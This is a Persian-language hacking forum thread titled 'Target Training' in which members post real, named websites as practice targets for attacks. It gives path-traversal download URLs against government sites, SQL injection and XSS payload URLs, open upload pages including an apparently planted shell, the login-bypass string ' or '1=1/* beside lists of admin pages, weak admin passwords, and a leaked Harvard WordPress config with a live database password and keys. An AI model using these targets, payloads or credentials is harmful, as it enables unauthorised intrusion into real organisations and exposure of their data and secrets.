SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Target Training

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Target Training

    سلام بر عزیزان

    با توجه به وجود تاپیک برای تمرین و تارگتینگ آسیب پذیری های RFU و SQLI تصمیم گرفتیم این بخش برای قرار دادن انواع باگ ها به همراه تارگت ها قرار بگیرد .

    در این تاپیک تمامی تارگت های آسیب پذیر جهت تمرین اعضا قرار خواهد گرفت . از قرار دادن تارگت تکراری و ایرانی خودداری نمائید .


     
    [align=center][/align]

  • #2
    RE: Target Training

    LFD از سایت اداره پلیس پاکستان :

    دانلود کانفیگ :

    کد:
    http://sargodhapolice.gov.pk/downloadfiles.php?action=download&filename=../includes/config.php
    دانلود ایندکس :

    کد:
    http://sargodhapolice.gov.pk/downloadfiles.php?action=download&filename=../index.php
    [align=center][/align]

    نظر


    • #3
      RE: Target Training

      weak password پسورد ضعیف

      کد:
      http://schoolportal.punjab.gov.pk/loginNew.asp
      
      admin
      
      909090
      [align=center][/align]

      نظر


      • #4
        RE: Target Training

        XSS

        کد:
        http://www.usa.com/locations.php?q=xss here
        http://www.usa.com/locations.php?q=%3Cscript%3Ealert%28%27iranhack.co m%27%29;%3C/script%3E

        کد:
        http://www.nasa.gov/externalflash/AIX/video-js.swf?readyFunction=alert%28%22IRH%22%29
        [align=center][/align]

        نظر


        • #5
          RE: Target Training

          Sql injection

          کد:
          http://fdma.gov.pk/ERFDMAMIS/description.php?recordID=9202%27
          [align=center][/align]

          نظر


          • #6
            RE: Target Training

            LFD
            کد:
            dork : inurl:download.php?file= site:.br
            کد:
            http://www.cnpdia.embrapa.br/publicacoes/download.php?file=download.php
            
            http://www.aesa.pb.gov.br/geoprocessamento/download.php?file=download.php
            
            http://www.aesa.pb.gov.br/geoprocessamento/download.php?file=../index.php
            
            http://www.crea-rs.org.br/crea/download.php?file=download.php
            
            http://maranguape.ce.gov.br/download.php?file=index.php
            
            http://apps.tre-am.gov.br/partidos/download.php?file=index.php
            [align=center][/align]

            نظر


            • #7
              RE: Target Training

              RFU - Direct access

              کد:
              http://vibanalysis.co.uk/fileupload/upload.php
              http://www.vibanalysis.co.uk/fileupload/Uploaded Files
              
              
              http://www.cloverleaf4.co.uk/upload.php
              http://www.cloverleaf4.co.uk/images/uploads
              
              
              http://unix.cms.gre.ac.uk/code/php/images/upload.php
              http://unix.cms.gre.ac.uk/code/php/images/display.php
              
              
              http://www.studentsonthegreen.co.uk/wp-content/plugins/simple-
              
              forum/editors/tinymce/plugins/tinybrowser/upload.php
              
              
              http://www.newtonandnoss-pc.gov.uk/upload.php
              
              http://thesmileyone.co.uk/upload.php
              http://thesmileyone.co.uk/uploads/iranhack.php
              [align=center][/align]

              نظر


              • #8
                RE: Target Training

                config uni harvard   :d

                http://www.fas.harvard.edu/~cafrica/wp-config.php

                کد:
                <?php
                /** Enable W3 Total Cache */
                define('WP_CACHE', true); // Added by W3 Total Cache
                
                
                /**
                * The base configurations of the WordPress.
                *
                * This file has the following configurations: MySQL settings, Table Prefix,
                * Secret Keys, WordPress Language, and ABSPATH. You can find more information
                * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
                * wp-config.php} Codex page. You can get the MySQL settings from your web host.
                *
                * This file is used by the wp-config.php creation script during the
                * installation. You don't have to use the web site, you can just copy this file
                * to "wp-config.php" and fill in the values.
                *
                * @package WordPress
                */
                // ** MySQL settings - You can get this info from your web host ** //
                /** The name of the database for WordPress */
                define('DB_NAME', 'm_africa');
                
                /** MySQL database username */
                define('DB_USER', 'm_africa');
                
                /** MySQL database password */
                define('DB_PASSWORD', 'Nev6Oil2rea5');
                
                /** MySQL hostname */
                define('DB_HOST', 'sitesdbprd301.unix.fas.harvard.edu');
                
                /** Database Charset to use in creating database tables. */
                define('DB_CHARSET', 'utf8');
                
                /** The Database Collate type. Don't change this if in doubt. */
                define('DB_COLLATE', '');
                
                /** HUIT HTTP Proxy Settings **/
                define('WP_PROXY_HOST', 'proxy.unix.fas.harvard.edu');
                define('WP_PROXY_PORT', '8888');
                define('WP_PROXY_BYPASS_HOSTS', 'harvard.edu');
                
                /**#@+
                * Authentication Unique Keys and Salts.
                *
                * Change these to different unique phrases!
                * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
                * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
                *
                * @since 2.6.0
                */
                define('AUTH_KEY',         '];+JqO<kkeS Z_apJO`MvaP(qo+;S;3]TQcs+93V6f%G6hREO{BtMpl#i+ayR`Ll');
                define('SECURE_AUTH_KEY',  ';BW5Sg`EegOKk:cQ5#$?K-+H+K6#Zi<7a).Lq0ez2sF(DLE8go|WA1PVW5CL+6T<');
                define('LOGGED_IN_KEY',    '-6_}__}/wGRRAI{:&%*|_.J;|]|cr/|=u 9!72Mmu@{llGf,P}xP_g8BF)i|>|K_');
                define('NONCE_KEY',        'EAlP7L.qRg]_8Zig-XwO+:fTa-Z?_!cx[p72/@-FTf!+t7eiE-fW<HZ[XfZG=.Fr');
                define('AUTH_SALT',        '{njn7q8i``V*)rT}M0/MHpccHiEaANm4`^n%78O,I0X?F&YBP;U0j}f0%:OgFr<-');
                define('SECURE_AUTH_SALT', '-nFlQfTss.1/Vo{)GKKlkT0jIZ(z(>;;nHVp]Ab9V=SPT0uaaT7B,JSZTS.kgs$|');
                define('LOGGED_IN_SALT',   '[#f[B5mDs-]8Pls4!+lj6bJ0/ikhk8^rZi7#(nHt9_#aBN?+DTIXgR*25--W[ilZ');
                define('NONCE_SALT',       '-02U/uHD).dl{L-8xqDiQ1z9F0)VQlS<Gm<eCv2&7H(9=Gp/wY~qryQ*qg~KuViE');
                /**#@-*/
                /**
                * WordPress Database Table prefix.
                *
                * You can have multiple installations in one database if you give each a unique
                * prefix. Only numbers, letters, and underscores please!
                */
                $table_prefix  = 'cas_';
                /**
                * WordPress Localized Language, defaults to English.
                *
                * Change this to localize WordPress. A corresponding MO file for the chosen
                * language must be installed to wp-content/languages. For example, install
                * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
                * language support.
                */
                define('WPLANG', '');
                /**
                * For developers: WordPress debugging mode.
                *
                * Change this to true to enable the display of notices during development.
                * It is strongly recommended that plugin and theme developers use WP_DEBUG
                * in their development environments.
                */
                define('WP_DEBUG', false);
                /* That's all, stop editing! Happy blogging. */
                /** Absolute path to the WordPress directory. */
                if ( !defined('ABSPATH') )
                define('ABSPATH', dirname(__FILE__) . '/');
                /** Sets up WordPress vars and included files. */
                require_once(ABSPATH . 'wp-settings.php');
                [align=center][/align]

                نظر


                • #9
                  RE: Target Training

                  کد:
                  http://www.houseconmin.gov.lk/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_adodisblog&author=
                  http://www.buddhistspace.com/index.php?option=com_media&view=images&tmpl=component&e_name=text
                  http://www.diffhospital.com/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_content&author=
                  http://lgmo.uplb.edu.ph/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
                  http://www.burnslaketrails.ca/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
                  http://literature.haifa.ac.il/index.php/he/?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_content&author=
                  http://sdar.com/index.php?option=com_media&view=images&tmpl=component&asset=com_gleez_widgets&author=&fieldid=jform_icon&folder=
                  http://www.ash-limudim.co.il/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_content&author=
                  http://www.invest-marvik.ru/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_content&author=
                  http://piginmuck.com/index.php?option=com_media&view=imagesList&tmpl=component&folder=&asset=com_jetestimonial&author=
                  http://www.winchester.us/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
                  http://www.ner.cap.gov/se/index.php?option=com_media
                  [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

                  که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو
                  [/align]

                  نظر


                  • #10
                    RE: Target Training

                    [align=center]SQL Injection[/align]


                    کد:
                    http://splits4you.com/products.php?id=64
                    http://bridges.co.uk/view_brief.php?id=10903
                    http://www.scboenigen.ch/news/news_main.php?newsid=69
                    www.vivactiv.ru/trainings/trainers.php?id=1
                    http://www.springfieldsbest.com/food.php?ID=6
                    http://www.aaminc.com/popup.php?id=15'
                    http://www.futurikon.com/popup.php?id=-78&
                    http://www.centre-keiko.com/mdm-popup.php?id=7'
                    http://www.cesky-hosting.cz/popup.php?id=62'
                    http://www.armandopace.com/modules/mod_ccnewsletter/helper/popup.php?id=62'
                    http://www.braunnw.com/popup.php?id=492'

                    نظر


                    • #11
                      RE: Target Training

                      سلام . رخصت . چندتا تارگت تمرینی bypass admin page[align=left]' or '1=1/*[/align][align=left]http://www.razielahotel.com/index.php
                      http://www.srilankacosmeticdental.com/adminlogin.php
                      https://www.nosarayoga.com/members/admin/adminLogin.php
                      http://wap.mconverge.in/news_update/admin_login.php
                      http://ekwap.com/v/myadmin/admin_login.php?errid=2
                      http://www.ptsworld.in/admin_login.php
                      http://www.dcsgroup.co.in/login.php
                      http://www.bswa.co.in/admin_login.php[/align]
                      خدایا! جهان پادشاهی تو راست.

                      نظر


                      • #12
                        RE: Target Training

                        چندتا دیگر ' or '1=1/*

                        [php]http://www.mouchakresorts.com/admin/
                        http://www.santiniketanresorts.co.in/admin_login.php
                        http://bmarco.co.in/admin/admin_home.php
                        http://royalairacademy.org/admin_login.php[/php]
                        [align=CENTER]:135:بازی دست ما افتاد:135:

                        [/align]

                        نظر


                        • #13
                          RE: Target Training

                          سلام . رخصت . چند تا تارگت تمرینی bypass admin page[align=left]' or '1=1/*[/align][align=left]http://www.wataugacountyfarmersmarket.org/members/admin_login.php
                          http://www.iiae.in/admin_login.asp
                          http://www.rescuefunding.com/admin/index.asp
                          http://ghandhycollegesurat.org/admin_login.asp
                          http://www.hollyjones.ca/admin_login.asp
                          http://www.gems.com.pk/Admin_Login.asp
                          http://www.parcotreja.it/public/it/damailinglist/admin_login.asp
                          http://address.nig-ltd.com/damailinglist/admin_login.asp[/align]
                          خدایا! جهان پادشاهی تو راست.

                          نظر


                          • #14
                            RE: Target Training

                            joomla :

                            http://www.hynet.it/administrator/index.php

                            user:admin
                            pass:123456

                            [img]images/smilies/Smileys/57.gif[/img]
                            [hr]
                            Local Write Access Vulnerability

                            http://med.rks-gov.net/security/lang.php?__By____Benyamin________IRANHACK_Security _Team

                            Result

                            http://med.rks-gov.net/security/lang.tmp
                            [align=center]IRH WebScanner Tools V.1
                            |90%//////////////////////////////////////////|

                            [/align]

                            نظر


                            • #15
                              RE: Target Training

                              SQL:

                              http://www.arma.com.sa/news.php?id=24%27
                              http://osareah.org.sa/news.php?id=347
                              http://www.siyaha.com.sa/ar/News.php?id=5


                              LFD:

                              https://www.kingabdullahport.com.sa/wp-content/themes/kap/download.php?url=download.php
                              https://www.mcdc.com.sa/download.php?f=download.php
                              -----------------------------SAFE MASTER---------------------------
                              تاپیک هکر های تازه وارد

                              نظر

                              صبر کنید ..
                              X